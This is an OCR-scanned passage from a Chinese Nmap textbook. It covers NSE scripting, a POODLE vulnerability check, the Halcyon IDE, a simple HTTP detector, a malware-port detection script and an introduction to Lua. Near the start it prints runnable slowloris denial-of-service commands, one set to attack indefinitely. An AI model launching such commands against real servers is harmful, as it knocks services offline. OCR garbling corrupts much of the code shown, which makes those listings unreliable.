参数 修改 为 15 分 钟 。 

Nmap -p 80 --script http-slowloris --script-args http-slowloris.timelimit=15m <target> 

http-slowloris.runforever 参数 指定 对 目标 一 直 发 动 DoS 攻击 ， 默 认 值 为 false。 现 在 持续 
向 目标 发 起 攻击 。 

Nmap -p 80 --script http-slowloris --script-args http-slowloris.runforever <target> 

另外 ，Nmap 中 还 有 一 个 名 为 http-slowloris-check.NSE 的 脚本 ， 这 个 脚本 并 不 会 真 的 发 
起 一 次 Dos 攻击 ， 而 是 检测 目标 是 否 有 抵御 这 种 攻击 的 能 力 ， 这 个 脚本 只 会 向 目标 发 送 两 个 
请 求 ， 执 行 这 个 脚本 的 命令 如 下 。 


Nmap -p 80 --script http-slowloris-check «target» 


2. 对 目标 服务 器 是 否 存在 POODLE 漏洞 进行 审计 

扫描 目的 : POODLE 漏洞 ( 亦 即 CVE-2014-3566 ) 最 早 是 由 谷歌 团队 发 现 的 。SSL 协议 
通常 被 看 作 一 个 十 分 安全 的 协议 。 最 新 的 SSL 3.0 更 是 被 看 作 安 全 通信 的 保证 ， 但 是 整个 漏 
洞 却 可 以 被 攻击 者 用 来 窃取 已 经 使 用 了 SSL 3.0 加 密 的 通信 过 程 中 的 通信 内 容 。 这 个 攻击 实 
现 看 似 有 很 大 的 难度 ， 需 要 攻击 者 完全 控制 网 络 的 流量 ， 但 随 着 公共 WiFi 日 益 普 及 ， 实 际 
上 已 经 不 难 做 到 。 

扫描 方法 : Nmap 中 提供 了 一 个 名 为 ssl-poodle 的 脚本 ， 可 以 用 来 检查 目标 服务 器 是 否 
存在 POODLE 漏洞 。 

扫描 命令 : 假设 目标 服务 器 211.81.200.8 是 一 台 使 用 了 SSL 加 密 的 服务 器 ， 现 在 对 这 台 
服务 器 进行 审计 ， 以 查看 该 服务 器 是 否 存在 POODLE 漏洞 ， 使 用 如 下 命令 。 


Nmap -sV --version-all --script ssl-poodle -p 443 211.81.200.8 


扫描 结果 : 对 目标 服务 器 是 否 存在 POODLE 漏洞 进行 扫描 的 结果 如 下 。 
PORT STATE SERVICE REASON 

443/tcp open https syn-ack 

| ssl-poodle: 
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VULNERABLE: 
SSL POODLE information leak 
State: VULNERABLE 
IDs:  CVE:CVE-2014-3566  0SVDB:113251 
The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and 
other products, uses nondeterministic CBC padding, which makes it 


| 

| 

| 

| 

| 

| 
easier 

| for man-in-the-middle attackers to obtain cleartext data via a 

| padding-oracle attack, aka the "POODLE" issue. 

| Disclosure date: 2014-10-14 

l Check results: 

| TLS RSA WITH 3DES EDE CBC SHA 

1 References: 

| https://www.imperialviolet.org/2014/10/14/poodle.html 

| http://osvdb.org/113251 

| http://cve.mitre.org/cgi-bin/cvename.cgi?name-CVE-2014-3566 

| https://www.openssl.org/-bodo/ssl-poodle.pdf 


根据 扫描 的 结果 可 以 看 到 该 服务 器 上 存在 POODLE 漏洞 。 

扫描 扩展 : 上 面 的 扫描 不 仅 给 出 了 该 服务 器 上 是 否 存 在 POODLE 漏洞 ， 同 样 给 出 了 该 
漏洞 的 详细 信息 。 通 过 这 些 信 息 我 们 可 以 更 加 详细 地 了 解 这 些 漏洞 的 成 因 ， 以 及 如 何 修复 这 
些 漏洞 。 





小 结 


经 过 本 章 的 学 习 , 已 经 对 NSE 有 了 一 个 初步 了 解 ， 并 且 学 习 了 Nmap 中 一 些 典 型 脚本 
的 执行 方法 。 随 后 按照 实际 工作 的 需要 分 别 介绍 了 一 些 脚本 的 应 用 。 从 下 一 章 开 始 ， 将 开始 
自己 动手 编写 一 些 脚本 。 


第 8 章 
NSE 的 编写 基础 08 


在 这 一 章 中 ,将 要 讲解 如 下 内 容 。 
口 NSE 脚本 的 基本 格式 。 
口 NSE 脚本 的 各 个 阶段 。 
口 NSE 开发 环境 的 设置 。 
Q NSE 基本 脚本 的 编写 。 


8.1 NSE 脚本 的 基本 格式 


一 个 完整 的 NSE 包括 如 下 几 部 分 。 

Q description 字段 : 这 部 分 内 容 介绍 该 NSE 的 功能 ， 在 Nmap 中 可 以 使 用 --script-help 
选项 来 阅读 其 中 的 内 容 。 

O categories 字段 : 这 部 分 内 容 给 出 了 该 NSE 所 在 的 分 类 ， 在 Nmap 执行 脚本 时 可 以 分 
类 执行 ， 具 体 的 分 类 可 以 参见 第 1 章 。 

Q action 字段 : 脚本 执行 的 具体 内 容 。 当 脚本 通过 rule 字段 的 检查 被 触发 执行 时 ， 就 会 
调用 action 字段 定义 的 函数 。 

Q rule 字段 : 描述 脚本 执行 的 规则 ， 也 就 是 确定 触发 脚本 执行 的 条 件 。 这 个 规则 是 一 个 
Lua 函数 ， 返 回 值 只 有 true 和 false 两 种 。 只 有 当 rule 字段 返回 true 时 ，action 中 的 函 
数 才 会 执行 。 


€ 
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图 8-1 给 出 了 一 个 NSE 脚本 的 格式 。 








1 local shortport = require "shortport^ 
2 

3 description = [[]] 

4 

5 (author = "admin" 

6 

7 categories = ('default^] 

8 


10 portrule = function( host, port ) 
11 return true 
12 end 


15 action = function(host, port) 





19 end 


license = "Same as Nnap--See http://nmap. org/book/nan-legal. html” 








图 8-1 一 个 NSE 脚本 的 格式 


8.2 NSE 脚本 的 规则 


NSE 脚本 的 执行 要 与 Nmap 中 的 扫描 相 结合 ， 因 此 两 者 执行 的 先后 顺序 必须 做 出 规定 。 


通常 这 两 者 的 执行 顺序 要 由 设 定 的 规则 来 决定 ， 目 前 一 共有 4 种 规则 。 


O Prerule() 规则 ， 这 个 规则 的 执行 要 早 于 Nmap 的 扫描 ， 因 此 这 类 脚本 不 会 调用 Nmap 





扫描 得 到 的 任何 结果 。 执 行 的 顺序 是 先 脚本 ， 后 Nmap 扫描 。 


O Hostrule() 规则 ， 这 个 规则 是 在 Nmap 已 经 完成 了 主机 发 现 之 后 执行 的 ， 根 据 3 
现 的 结果 来 触发 该 类 脚本 。 执 行 的 顺序 是 先 Nmap 主机 发 现 ， 后 脚本 。 





机 发 


Q Portrule() 规则 ， 这 个 规则 与 hostrule() 规则 相 类 似 ， 不 过 是 在 执行 了 端口 扫描 或 版 本 
侦 测 时 才 会 触发 的 脚本 ， 这 个 规则 的 执行 与 端口 的 状态 联系 紧密 。 执 行 的 顺序 是 先 


Nmap 端口 扫描 ， 后 脚本 。 


O Postrule() 规则 ， 这 个 规则 是 在 Nmap 已 经 完成 所 有 的 扫描 之 后 才 执行 ， 一 般 用 来 处 


理 扫描 结果 。 执 行 的 顺序 是 当 所 有 的 扫描 都 结束 以 后 才 会 执行 脚本 。 
例如 ， 在 一 段 检测 可 疑 端 口 的 脚本 中 有 如 下 这 样 一 段 代 码 。 


portrule = function(host, port) 
return port.service -- "smtp" and 


port.number ~= 25 and port.number ~= 465 and port.number -- 587 


and port.protocol -- "tcp" 
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and port.state == "open" 


在 这 个 实例 中 ， 只 有 一 个 portrule， 说 明 这 个 脚本 就 是 在 执行 端口 扫描 后 运行 的 。 后 面 
内 容 会 对 这 段 检测 可 疑 端口 的 脚本 进行 介绍 。 


8.3 NSE 开发 环境 的 设置 


编写 NSE 并 不 需要 特殊 的 开发 环境 ， 你 完全 可 以 使 用 你 已 经 习惯 了 的 开发 环境 。 例 如 
vi, nano, gedit 甚至 记事 本 也 可 以 。 不 过 这 些 开 发 环境 并 不 具备 调试 的 功能 ， 所 以 在 这 里 推 
荐 一 个 用 Java 编写 的 Halcyon 编辑 器 。 这 个 编辑 器 允许 你 对 NSE 进行 调试 ， 同 时 也 提供 了 
代码 补 全 和 语法 高 亮 的 功能 。 

图 8-2 展示 了 本 书 编写 时 最 新 的 Halcyon 2.0 编辑 器 工作 界面 。 
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图 8-2 Halcyon 2.0 编辑 器 工作 界面 


这 个 开发 环境 还 在 不 断 进 步 中 ， 你 可 以 访问 http://halcyon-ide.org/ 下 载 编辑 器 。 

当 你 在 计算 机 中 安装 Nmap 之 后 ， 安 装 目录 中 就 会 生成 一 个 script.db 文件 。 你 的 所 有 脚 
本 文件 的 信息 都 保存 在 这 个 文件 中 。 这 些 脚本 在 script.db 中 的 保存 格式 如 图 8-3 所 示 。 

在 第 一 次 使 用 Halcyon_IDE_v2.0.jar 编辑 器 之 前 ， 需 要 对 路 径 进行 配置 ， 如 图 8-4 所 示 。 

单 击 “是 ”按钮 之 后 会 弹出 一 个 如 图 8-5 所 示 的 对 话 框 。 
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Entry { filenane 
Entry | filename 
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"acarsd-info.nse^, categories = [ "discovery', “safe”, } } 
"address-info.nse", categories = { "default", "safe", ] ] 
11 





Entry { filename = "afp-brute.nse", categories = [ “brute”, “intrusive”, 
Entry { filename = "afp-ls.nse', categories = [ “discovery”, “safe”, } ] 


Entry 
Entry [ filename = "afp-serverinfo.nse', categories 





Entry { filename = "afp-showmount.nse", categories = [ “discovery”, “safe”, } } 
Entry { filename = “ajp-auth. nse”, categories = { "auth', “default”, "safe", ] ] 


Entry | filenane 
Entry { filename 
Entry | filenane 
Entry { filename 
Entry { filename = "allseeingeye-info.nse', categories = [ 'discovery/, "safe”, "version', ] | 

Entry [ filename = "amgp-info.nse^, categories = { default“, "discovery', "safe', "version', ] | 





"ajp-brute.nse", categories = [ “brute”, intrusive’, ] ] 
"ajp-headers.nse^, categories = | 'discovery', "safe^, } ] 
*ajp-methods.nse", categories = [ “default”, "safe", ] | 

"ajp-request.nse^, categories = { “discovery”, "safe', ] ] 














图 8-3 script.db 的 内 容 


企 Classpath is not configured. Halcyon will not work as desired without this configuration. 


Click Yes to configure now or No to quit. 


















































图 8-5 Halcyon 2.0 的 自动 配置 界面 (一 ) 
在 这 里 单 击 “Auto Config” 按 钮 ， 如 图 8-6 所 示 。 








Nmap Path: CiProgramFiles (x86)Nmapinmap.exe. 








NSEPath: C:Program Files (x86)Nmaptscripts 


LibPath: C:\Program Files (x85)Nmapinselibt 








Apply 


























图 8-6 Halcyon 2.0 的 自动 配置 界面 (二 ) 


filename = "afp-path-vuln.nse^, categories = [ “exploit”, “intrusive”, "vuln', ] } 
[ “default”, "discovery", "safe", } } 
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如 果 你 的 Nmap 安装 目录 与 这 里 展示 的 有 所 不 同 的 话 ， 可 以 手动 进行 调整 ， 然 后 单 击 
“Apply” 按 钮 。 应 用 之 后 Halcyon IDE v2.0.jar 的 配置 就 完成 了 。 

接 下 来 介绍 编写 一 个 新 的 脚本 并 将 其 添加 到 Nmap 中 的 步骤 。 

步骤 1: 打开 Halcyon IDE v2.0.jar 编辑 器 ， 选 择 新 建 一 个 项 目 ， 如 图 8-7 所 示 。 








D apsnowmountnss 
Dapevnnse 


D arbtense 
D apneaass nso 
Dy ae mettossnse 


, mense 
D amaointonse 

口 saraernse 

中 aunewnernss 

D) auhrspoonee 

口 econnceonuense 
D vareortice inlo nce 
D banetintonse 




















图 8-7 创建 一 个 新 的 项 目 

3588 2: 弹出 一 个 对 话 框 ， 然 后 要 求 填写 脚本 的 存储 位 置 和 分 类 ， 如 图 8-8 所 示 。 
coco iens 

sme a 











Description : 



























































图 8-8 设置 脚本 的 存储 位 置 和 分 类 
这 时 可 以 看 到 编辑 器 已 经 生成 了 一 个 如 图 8-9 所 示 的 NSE 脚本 的 模板 文件 。 
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1 local shortport = require ^shortport^ 
description = [[]] 


license = "Same as Nmap--See http://nmap. org/book/man-legal.html" 


2 

3 

4 

5 author = "admin" 
6 

7 categories = ('default^] 
8 

9 


10 portrule = function( host, port ) 
e" return true 
12 end 


15 action = function(host, port) 











19 end 





图 8-9 一 个 标准 NSE 脚本 的 模板 文件 
现在 还 不 需要 填 人 具体 的 内 容 ， 将 这 个 模板 文件 直接 保存 ， 如 图 8-10 所 示 。 





|" 





anu D D Os [au 








panes | 








local shortport = require “shortport™ 








description = [[]] 


author = "admin? 
license = "Same as Naap—See http://naap. org/boo 
7 categories = ("default") 





I D afp-showmountnse 
H D aip-autinse. portrule = function( host, port ) 
L Dy aip-brute nse. return true 

D) aip-headers. nse end 
-Daip-methods nse 
|- 口 aprequestnse 
~ D aliseeingeye-info.nse. action = function(host, port) 














图 8-10 保存 脚本 


步骤 3: 将 脚本 testNSE 文件 复制 到 Nmap 安装 目录 的 scripts 文件 夹 中 。 
步骤 4: 在 Nmap 中 运行 如 下 命令 。 

Nmap --script-updatedb 

经 过 以 上 步 又， 就 将 编写 的 tes. NSE 脚本 添加 到 Nmap 的 script.db "P T o 
在 NSE 中 还 需要 注意 如 下 环境 变量 。 
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O SCRIPT PATH: 这 个 环境 变量 是 脚本 运行 的 绝对 路 径 。 

Q SCRIPT NAME: 这 个 环境 变量 是 脚本 运行 时 的 名 字 。 

口 SCRIPT_TYPE : 这 个 环境 变量 是 脚本 的 执行 规则 ， 只 能 是 prerule hostrule, portrule 
或 者 postrule。 


8.4 编写 简单 的 NSE 脚本 


本 节 介 绍 如 何 编写 一 个 简单 的 脚本 来 实现 对 一 个 Web 服务 器 的 检测 功能 。 这 个 脚本 的 
功能 很 简单 ， 它 会 对 目标 进行 检测 ， 如 果 发 现 目标 开放 了 80 端口 ， 并 且 在 这 个 端口 上 运行 
HTTP 服务 ， 那 么 Nmap 则 输出 “This is a WebServer”。 

首先 启动 Halcyon_IDE_v2.0.jar， 新 建 一 个 NSE 脚本 ， 如 图 8-11 所 示 。 
















































































[oc NNNM) 
Script Name : o 
Description : 

PortiService : |default [~ 
Author: admin 
auth = 
broadcast m 
Category 
| (defaut. i S 
Create Cancel 
| 





图 8-11 创建 一 个 新 的 脚本 


选择 脚本 的 分 类 为 “discovery”， 然 后 单 击 create 按钮 ， 如 图 8-12 所 示 。 

然后 选择 要 保存 的 目录 和 脚本 名 ， 这 里 以 my-http-detect.NSE 为 名 保存 在 C 盘 下 ， 如 图 
8-13 所 示 。 

现在 可 以 在 这 个 新 的 脚本 中 添加 内 容 了 ， 如 图 8-14 所 示 。 

首先 添加 description 字段 ， 这 里 只 是 一 段 介绍 性 的 文字 ， 用 于 说 明 脚 本 的 目的 和 用 法 ， 
没有 严格 的 要 求 。 


description = [[Checks if HTTP is running on the port 80.]] 
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C Program Files (x86) D) InstallConfig.ini. 











[mrnap-detednse 


文件 奖 型 (D，| 所 有 文件 - 














1 (local sbortport = require “shortport 
description = [(]] 


license = "Same as Ninap 一 See nttp://nmap. org/book/nan-legal. html" 


3 
4 

5 author = "admin 

5 

7 categories = ("discovery ] 


10 pertrule = function( host, port ) 
nu return true 
12 end 


15 action = function(host, port) 











图 8-14 ”新建 的 my-http-detect.NSE 脚本 
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author 字段 是 脚本 作者 的 名 字 。 

author - "Liu Kai" 

如 果 没 有 特殊 原因 的 话 ，liceNSE 字段 的 内 容 无 须 修改 。 

liceNSE = "Same as Nmap--See https://Nmap.org/book/man-legal.html" 

因为 在 之 前 已 经 选择 了 分 类 ， 所 以 这 里 的 categories 已 经 有 了 分 类 。 

categories = ("discovery") 

接 下 来 就 是 关键 部 分 了 。 这 里 因为 评估 目标 是 否 为 Web 服务 器 要 根据 目标 的 端口 状态 和 
目标 端口 上 的 服务 来 决定 ， 所 以 选择 portrule 规则 。 


portrule = function(host, port) 


return port.protocol -- "tcp" and port.number == 80 and port.service -- 
"http" and port.state == "open" 
end 


这 样 当 目 标 服务 器 上 开放 的 80 端口 运行 着 HTTP 服务 的 时 候 ， 就 可 以 执行 action 部 分 。 
编写 当 portrule 返回 值 成 功 的 时 候 执行 的 代码 。 


action = function() 
return " This is a WebServer" 


end 
图 8-15 给 出 了 完成 后 的 代码 。 


C:\Program Files (x86)Nmaptscriptsmy-http-detectnse | 


1 local shortport = require ^shortport^ 











description = [[]] 


license = "Same as Nmap--See http://nmap. org/book/nan-legal. htnl" 


3 
4 
5 author = "Administrator 
6 
7 categories = ('default^] 
8 


10 portrule = function(host, port) 
M return port.protocol == “tcp” and port. number == 80 and port.service == "http' and port.state == "open" 
12 end 


16 action = function() 
return ^ This is a WebServer| 





18 end 








图 8-15 SEX] my-http-detect. NSE 代码 
将 脚本 保存 到 NSE 的 scripts 目录 下 ， 然 后 在 Nmap 中 执行 “Nmap --script-updatedb " , 
另外 也 可 以 在 Halcyon IDE 的 File 菜单 中 选择 “ Update Script DB ”命令 ， 如 图 8-16 所 示 ， 
两 种 方法 的 作用 是 相同 的 。 
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Halcyon IDE 2.0 - IDE for Nmap Script Development 
Edit Project Help | 






















































































New ono oo [scanme.nmap.org [defaut 
Open Cio 1 
Save eus H* 
1 local shortport = require "shortport" 
Save As.. 2 
Close 3 description = [[Checks if HITP is running on the port 80| 
Export Script 4 
5 author - “admin” 
Print EE 6 [icense = Sane as Nnap— See http://nmap. org/book/man-leg 
7 categories = {"discovery"} 
Exit cea 
8 
图 8-16 使 用 Update Script DB 功能 
接 下 来 在 Nmap 中 执行 这 个 脚本 。 





Nmap -p 80 --script my-http-detect www.tstc.edu.cn 


图 8-17 给 出 了 扫描 的 结果 。 

































































取消 
命令 :| nmap -p 80 --script my-http-detect www.tstc.edu.cn 
Nmap 输 出 
nmap -p 80 --script my-http-detect www.tstc.edu.cn lz] z (mn) | 





Starting Nmap 7.36 ( https://nmap.org ) at 2016-11-04 16:13 ?D1ditex3?Et2?? 
Nmap scan report for ww«.tstc.edu.cn (211.81.200.8) 

Host is up (0.0016s latency). 

rDNS record for 211.81.200.8: jpkc.tstc.edu.cn 

PORT STATE SERVICE 





Nmap done: 1 IP address (1 host up) scanned in 10.07 seconds 

































































上 面 的 脚本 实现 了 一 个 简单 的 功能 。 注 意 ， 这 个 过 程 中 并 没有 定义 任何 扫描 方式 ， 其 中 
的 结果 依赖 于 Nmap 的 扫描 。 在 后 面 的 章节 中 还 会 详细 介绍 Nmap 的 API 和 库 文件 ， 这 样 可 


图 8-17 my-http-detect 脚本 的 执行 结果 





以 编写 功能 更 为 强大 的 脚本 。 
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8.5 实例 应 用 : 垃圾 邮件 木马 的 检测 


前 面 给 出 的 这 个 例子 很 简单 ， 但 是 在 实际 应 用 中 却 十 分 有 效 。 之 所 以 脚本 中 代码 比较 简 
单 ， 是 因为 对 目标 的 扫描 过 程 都 已 经 由 Nmap 完成 了 ， 接 下 来 看 一 个 Nmap 中 自 带 的 脚本 。 

处 理 垃圾 邮件 是 一 件 让 全 世界 人 民 都 感到 十 分 苦恼 的 事情 ， 每 天 电子 邮箱 中 充斥 着 广告 
和 坎 诈 邮件 ， 令 人 反感 的 程度 一 点 都 不 次 于 骚扰 电话 。 现 在 很 多 邮件 服务 商都 给 出 了 针对 垃 
圾 邮件 的 解决 方案 ,但 是 并 没有 从 源头 上 解决 这 个 问题 。 

事实 上 ,大量 的 垃圾 邮件 都 是 在 发 送 端 不 知情 的 情况 下 发 出 来 的 ， 发 送 端 往往 在 不 知情 
的 情况 下 感染 了 恶意 的 木马 软件 ， 随 后 木马 软件 就 会 在 发 送 端 上 开启 一 个 隐蔽 的 端口 ， 然 后 
在 这 个 端口 上 运行 SMTP 服务 ， 源 源 不 断 地 向 外 发 送 垃圾 邮件 。 

既然 已 经 了 解 了 这 类 木马 的 工作 流程 ， 那 么 接 下 来 就 要 设计 一 个 脚本 检测 网 络 主机 是 否 
感染 了 垃圾 邮件 木马 。 这 个 脚本 应 该 实现 以 下 功能 。 

口 对 目标 主机 的 端口 进行 检测 。 

口 查看 是 否 有 异常 的 端口 开放 了 SMTP 服务 。 

口 输出 这 个 异常 的 端口 。 

接 下 来 按照 这 个 思路 来 编写 这 个 脚本 的 关键 部 分 ， 具 体 步 又 如 下 。 

步骤 1 : 选择 execution rule， 因 为 这 个 脚本 是 通过 对 目标 主机 端口 扫描 的 结果 分 析 得 到 
的 ， 所 以 选择 执行 如 下 规则 。 

portrule = function(host, port) 

步骤 2 : 要 对 这 个 检测 得 到 的 port 表 中 的 所 有 内 容 进行 检测 ， 首 先 查看 是 否 有 SMTP 
服务 。 





port.service -- "smtp" 
然后 检测 该 服务 是 否 在 不 正常 的 端口 上 运行 ，SMTP 正常 应 该 运行 在 25、465 或 者 587 
端口 上 。 


port.number ~= 25 
and port.number ~= 465 


and port.number ~= 587 
and port.protocol == "tcp" 
and port.state -- "open" 


步骤 3 : 如 果 扫 描 结果 不 符合 上 述 两 个 规则 ， 那 么 action 中 的 行为 就 会 返回 这 个 异常 的 
端口 。 
return "Mail server on unusual port: possible malware" 


到 此 为 止 已 经 完成 了 这 个 脚本 。 
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图 8-18 给 出 了 这 个 脚本 的 完整 部 分 。 





description = [[ 
Checks if SMIP is running on a non-standard port. 


system to send spam or control the machine. 


11 


1 
2 
3 
4 
5 [This may indicate that crackers or script kiddies have set up a backdoor on the 
5 
7 
8 
9 


10 | 一 @output 

11 |— 22/tcp open smtp 

12 | 一 |  smtp-strangeport: Mail server on unusual port: possible malware 
13 

14 author = "Diman Todorov” 

15 


16 license = "Same as Nmap--See https://nmap. org/book/man-legal. html” 


18 categories = {"malware", “safe”} 


19 

20 portrule = function(host, port) 

21 return port. service == “smtp” and 

22 port. number “= 25 and port. number “= 465 and port. number “= 587 
23 and port.protocol == “tcp” 

24 and port. state == “open” 

25 end 

26 


27 action = function() 
28 return "Mail server on unusual port: possible malware” 
29 end 











图 8-18 完整 的 垃圾 邮件 木马 检测 脚本 


这 个 脚本 很 容易 理解 ， 因 为 在 这 个 脚本 中 并 没有 使 用 任何 库 或 者 API， 在 后 面 的 章节 中 
将 会 详细 讲解 Nmap 中 的 库 和 API。 





小 结 


经 过 这 一 章 的 学 习 ， 已 经 掌握 了 NSE 脚本 开发 环境 的 配置 和 使 用 ， 而 且 实践 了 一 个 简 
单 的 扫描 实例 。 当 进一步 了 解 NSE 中 的 库 文 件 之 后 ， 就 可 以 发 挥 NSE 真正 的 力量 了 。 下 一 
章 将 开始 使 用 Lua 脚本 语言 。 
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Lua 这 个 名 称 来 源 于 葡萄 牙 语 ， 意 为 “美丽 的 月 亮 ” 。 最 初 这 门 语言 被 设计 用 来 嵌入 到 
应 用 程序 中 ， 因 而 这 门 语言 极为 轻 量 小 巧 。Lua 是 由 巴西 里 约 热 内 卢 天 主教 大 学 的 Roberto 
Ierusalimschy、Waldemar Celes 和 Luiz Henrique de Figueiredo 所 组 成 的 一 个 研究 小 组 在 1993 
年 开发 的 。 

目前 NSE 中 允许 用 户 使 用 Lua 语言 开发 脚本 来 扩展 Nmap 的 能 力 。 本 书后 面 介绍 的 实 
例 都 采用 Lua 语言 开发 ， 不 过 即使 你 对 这 门 语言 十 分 陌生 ， 你 也 不 必 有 任何 担心 。Lua 语言 
是 一 门 十 分 简单 易学 的 语言 ， 只 要 你 拥有 一 点 编程 的 基础 ， 就 可 以 轻松 上 手 。 不 过 它 的 内 容 
十 分 丰富 ， 如 果 想 全 面 深 入 地 学 习 这 门 语言 ， 我 建议 你 最 好 使 用 一 本 完整 的 教材 ， 限 于 篇 
幅 ， 本 书 只 是 介绍 了 与 NSE 相关 的 必需 部 分 。 

好 了 ， 现 在 开始 学 习 Lua。 

通过 这 一 章 的 学 习 ， 将 会 掌握 关于 Lua 语言 的 以 下 内 容 。 

口 Lua 语言 的 顺序 、 选 择 和 循环 结构 。 

口 Lua 语言 的 数据 类 型 。 

口 Lua 语言 的 字符 串 处 理 。 

口 Lua 语言 的 常见 数据 结构 。 

Q Lua 语言 的 VO 操作 。 

口 Lua 语言 的 Coroutines。 


Q Lua 语言 的 其 他 相关 部 分 。 
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9.1 Lua 的 编程 环境 


最 初 设计 Lua 的 目的 是 能 够 得 到 一 种 适合 嵌入 应 用 程序 的 语言 。 因 此 Lua 语言 十 分 小 
巧 ,但 是 却 能 够 提供 灵活 的 功能 。 例 如 《魔兽 世界 《愤怒 的 小 鸟 》 等 游戏 都 选择 了 Lua 作为 
自己 的 嵌入 式 脚本 语言 。Lua 语言 是 使 用 C 语言 设计 开发 的 。 


9.1.1 在 Windows 系统 上 安装 Lua 编程 环境 
Windows 下 软件 的 安装 是 十 分 简单 的 ， 只 需要 从 下 面 的 


地 址 下 载 安 装 文件 ， 


然后 执行 即 可 。 


Github F 载 地 址 为 https:Wgithub.com/rjpcomputing/lua- 


forwindows/releases。 


然后 双击 安装 这 个 文件 即 可 。 安 装 完 成 以 后 ， 在 你 的 开 
始 菜单 将 会 添加 如 图 9-1 所 示 的 项 目 。 

本 文中 的 实例 使 用 了 iLua 和 SciTE 两 种 环境 。 这 里 使 用 
的 SciTE 编辑 器 的 界面 如 图 9-2 所 示 。 








ad " 
|[Ele Edit Search View Iools Options Language Buffers 
Hel 





p 
PLAIES REJ I L S WS 3g 





J ua 
图 ilua (Friendly Lua Command Line 


T IExecutor 








€ Lua (Command Line) 

Lua Examples 

LÌ LuaForWindows Documentation 
T QuickLuaTour 

Q sire 

更 Uninstall Lua 

|j Documentation 





图 9-1 安装 Lua 以 后 的 开始 菜 
单 (Windows 环境 下 ) 





Debug 




















n iCokiSekO | Saved: | INS] [CR+LF] | 








图 9-2 SciTE 编辑 器 工作 界面 


9.1.2 在 Linux 系统 上 安装 Lua 编程 环境 
Lua 在 Linux 和 Mac 上 的 安装 也 并 不 复杂 ， 以 Lua-5.3.0 的 安装 为 例 ， 打 个 终端 ， 


然后 输入 如 下 命令 。 


curl -R -O http://www.lua.org/ftp/lua-5.3.0.tar.gz 


tar zxf lua-5. 


cd lua-5.3.0 


3.0.tar.gz 


make linux test 
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make install 


即 可 完成 Lua 的 安装 。 


9.2 第 一 个 Lua 程序 


Lua 的 工作 环境 中 提供 了 交互 式 的 编程 模式 ， 在 执行 中 可 以 立刻 看 到 执行 的 效果 。 这 样 
可 以 更 清楚 地 理解 Lua 的 基础 知识 。 首 先 打 开 命令 行 或 者 终端 ， 然 后 输入 lua -i 或 lua 来 启用 
Lua 交互 式 编程 模式 ， 如 图 9-3 所 示 。 








By SEA: CMWindows\system32\cmd.exe - lua -i [ITI 


t Corporation. E 


C:NisersMidninistrator2lua -i 
Lua 5.1.4 Copyright <C) 1994-2008 Lua.org, PUC-Rio 








图 9-3 Lua 的 命令 行 工作 模式 
在 命令 行 中 ， 可 以 使 用 print) 来 打印 输出 一 些 内 容 ， 例 如 : 
> print ("Hello, welcome to Lua World! ") 


然后 按 下 回 车 键 ， 查 看 发 生 的 变化 。 交 互 式 命令 行 中 输出 结果 如 图 9-4 所 示 。 





dly Lua Command Line) ames] 





1994-2888 Lua.org, PUC-Rio 


o 
> print("hello,uelcome to LUA Worldt") 


hello,uelcome to LUA World? 
> 








图 9-4 Lua 的 交互 式 命令 行 工作 模式 


另外 也 完全 可 以 像 C 语言 一 样 ， 将 一 个 程序 整个 写 完 以 后 ， 然 后 再 执行 。 这 种 模式 被 称 
为 脚本 式 编程 ， 例 如 在 SciTE 中 编写 如 图 9-5 所 示 的 代码 。 

然后 单 击 工具 行 上 的 执行 按钮 ， 如 图 9-6 所 示 。 

这 个 SciTE 编辑 器 分 为 上 下 两 栏 ， 上 面 为 代码 栏 ， 下 面 是 执行 结果 栏 。 这 个 程序 的 输出 
结果 如 图 9-7 所 示 。 
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print("HelTo, welcome to LUA wor Td? 
print("Hello, welcome to NMAP world " 









































[ET TIT 3 melo 





print(" "Hello, welcome to map world "Y 





|iello, welcome to Lua wordt 
iello, er rg to NMAP world 
PExit code: 


|n: 4 Col 1Sel0 | Saved: 2016/11/3 星期 四 下 午 1:34:10 | [INS] [CR+LF] | 
一 celi EM 








图 9-7 SciTE 编辑 器 的 上 下 两 栏 


9.3 Lua 流程 控制 


Lua 编程 语言 流程 控制 语句 通过 对 给 定 的 条 件 进行 判断 ， 从 而 决定 执行 两 个 或 多 个 分 支 
中 的 哪 一 支 。 流 程控 制 语句 中 最 为 典型 的 就 是 让 语 句 也 称 单 分 支 证 语句 。 计 语句 由 一 个 值 为 
true 或 者 false 的 条 件 语句 和 其 他 语句 组 成 ， 例 如 图 9-8 中 就 给 出 了 一 个 让 语句 的 实例 。 





ENprogram Files k86JNLUaN 1\examples\bisect lua - ScTE 


EE 








Fie Edit Search View Tools Options Language Buffers Debug 








ATC l FE LEET EAT] 








=TT irue then 
printCthis is true") 
e 


ousunr| 














[Tua -e "To. stdout :setvbu "no™ "bTsect. Tua 
his is true 
>Exit code: 


~ 
Ln: 3 Col 4 Sek 0 | Saved: 2016/11/3 星期 四 下 午 212:18 | [NS] [CR+LF | 


xal». 


























图 9-8 Lua'Pfff4rx ifii] 
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除了 单 分 支 证 语 句 之 外 ，Lua 语言 也 支持 双 分 支 的 if…else 语句 ， 在 让 条 件 表 达 式 为 
true 的 时 候 ， 执 行 让 后 面 的 语句 ， 在 并 条 件 表达 式 为 false 时 执行 else 语句 代码 。 例 如 图 9-9 
中 就 给 出 了 一 个 双 分 支 if…else 语句 的 实例 。 


@ cprogram Files (x86N\Lua\S 1\examples\bisectlua - SciTE [Er] 


Ele Edit Search View Tools Options Language Buffers Debug Help 
[D ču] S| seocoWNmNESUHEN * i 


statusz: 
i Status, == 200 then 
nt('The Status 35. ioo ") 
ee status == 
rint("rhe dens Ast 301" 2 




















m> 

















图 9-9 Lua 中 的 双 分 支 f…else 语句 
在 面临 一 些 比较 复杂 的 情况 时 ， 也 会 将 多 个 if…else 联合 使 用 ， 图 9-10 中 给 出 了 一 个 多 
TÉ if…else 语句。 





Fle Edit Search View Iools Options Language Buffers Debug Help 
[DG Hia »melQci»NEGINHSSE rS 


























00 then 

he status is 200") 

elSeif Status-- 
pi 


int("The status is 301") 
else 
print("rhe status is unknown") 
end 


e. status A unknown 
Exit code: 








P ——————— 

Ln: 1 Col: 11 Sel:0 | Saved: 2016/11/3 星期 四 下 午 2:18:43 | [INS] [CR+LF] | - 
图 9-10 Lua 中 的 多 重 if…else 语句 

需要 注意 的 是 ， 控 制 结构 的 条 件 表达 式 结果 可 以 是 任何 值 ，Lua 认为 false I nil 都 是 假 ， 


true 和 非 nil 都 是 真 。 


























9.4 Lua 中 的 循环 结构 
